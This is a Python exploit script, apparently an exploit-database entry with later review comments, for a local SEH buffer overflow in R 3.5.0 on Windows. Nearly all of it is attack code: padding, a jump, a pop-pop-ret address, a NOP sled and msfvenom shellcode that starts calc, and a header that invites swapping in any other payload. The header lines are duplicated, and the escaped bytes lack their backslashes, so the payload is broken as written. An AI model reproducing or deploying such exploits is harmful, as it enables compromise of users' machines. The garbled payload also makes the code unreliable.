#!/usr/bin/python
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r-project.org/
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Version: 3.5.0
# Tested on: Windows XP Prof SP3 ENG x86
# Note: SEH exploitation method (SEH + DEP Bypass exploit for Windows 7 x86 by Bzyo available on exploit-db)
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Edit' then 'Gui Preferences'
# 3.) Paste the contents of exploit.txt under 'Language for menus and messages'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#PPR Information
#Message= 0x6cb99185 : pop ebx # pop esi # ret 0x08 | {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.5.0

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "x00x0ax0dx1ax7d" -f c
# Payload body as reproduced in this copy of the advisory.
#
# NOTE(review): every chunk below consists only of the characters 'x',
# digits and a-f with no backslashes, so Python evaluates it as plain
# ASCII text, not as the escaped byte string the msfvenom comment above
# describes.  Treat the value as text when triaging or hashing a file
# produced by this script.
_chunks = [
    "xd9xc6xb8x06x7fx92x78xd9x74x24xf4x5bx29xc9xb1",
    "x31x83xc3x04x31x43x14x03x43x12x9dx67x84xf2xe3",
    "x88x75x02x84x01x90x33x84x76xd0x63x34xfcxb4x8f",
    "xbfx50x2dx04xcdx7cx42xadx78x5bx6dx2exd0x9fxec",
    "xacx2bxccxcex8dxe3x01x0excax1exebx42x83x55x5e",
    "x73xa0x20x63xf8xfaxa5xe3x1dx4axc7xc2xb3xc1x9e",
    "xc4x32x06xabx4cx2dx4bx96x07xc6xbfx6cx96x0ex8e",
    "x8dx35x6fx3fx7cx47xb7x87x9fx32xc1xf4x22x45x16",
    "x87xf8xc0x8dx2fx8ax73x6axcex5fxe5xf9xdcx14x61",
    "xa5xc0xabxa6xddxfcx20x49x32x75x72x6ex96xdex20",
    "x0fx8fxbax87x30xcfx65x77x95x9bx8bx6cxa4xc1xc1",
    "x73x3ax7cxa7x74x44x7fx97x1cx75xf4x78x5ax8axdf",
    "x3dx94xc0x42x17x3dx8dx16x2ax20x2excdx68x5dxad",
    "xe4x10x9axadx8cx15xe6x69x7cx67x77x1cx82xd4x78",
    "x35xe1xbbxeaxd5xc8x5ex8bx7cx15",
]
shellcode = "".join(_chunks)

# Full string written to exploit.txt, left to right: 884 filler
# characters, two 4-token groups (the second one spells, byte for byte
# in little-endian order, the address given in the "PPR Information"
# comment above), 20 repetitions of a one-token group, the payload body,
# and 8868 trailing filler characters.  The same missing-backslash
# remark as above applies to these token groups.
#
# The name `buffer` shadows the Python 2 builtin of that name; it is
# kept because the block below reads it.
_layout = [
    "A" * 884,
    "xEBx09x90x90",
    "x85x91xb9x6c",
    "x90" * 20,
    shellcode,
    "D" * 8868,
]
buffer = "".join(_layout)

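payload = buffer

# Write the payload string to exploit.txt in the current working
# directory.  `with` guarantees the handle is closed even when write()
# fails (the original closed it only on the success path).  Only I/O
# errors are caught: the original bare `except:` swallowed every
# exception, including KeyboardInterrupt and programming errors, and
# reported them all as "File cannot be created" without the reason.
# print() with one parenthesised argument behaves the same on Python 2
# and 3.
try:
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as err:
    print("File cannot be created: %s" % err)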